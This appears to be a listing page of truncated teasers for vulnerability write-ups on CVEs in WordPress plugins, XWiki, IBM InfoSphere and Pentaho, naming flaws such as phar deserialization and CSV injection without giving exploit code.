CVE-2022-3536 The Role Based Pricing plugin before 1.6.3 has no authorization and validation, which allows any authenticated user to perform phar deserialization attack.
they can upload a file, and a suitable gadget chain is present on the blog, such as Google Analytics, the attackers can inject malicious code
CVE-2022-3558 The Import and export users and customers WordPress plugin before 1.20.5 does not properly escape data when exporting it via CSV files.
This is a pretty big issue as it can lead to security issues when the exported data is used by other applications or services. This
CVE-2022-39387 - Breaking into XWiki via OpenID Connect Parameter Tampering
In late 2022, a critical vulnerability was discovered in XWiki's OpenID Connect (OIDC) authentication module. XWiki, an open-source enterprise wiki and knowledge management
CVE-2022-22425 - Exploiting CSV Injection in IBM InfoSphere Information Server 11.7
CSV (Comma-Separated Values) files are one of the simplest and most common ways to share tabular data. But with this simplicity comes a severe security
CVE-2021-45446 - Hidden Property Fails in Pentaho Server, Exposing Sensitive Directory Listings
In late 2021, a security flaw (CVE-2021-45446) was discovered in Hitachi Vantara Pentaho Business Analytics Server. This post dives into what makes this vulnerability dangerous,
Episode
00:00:00
00:00:00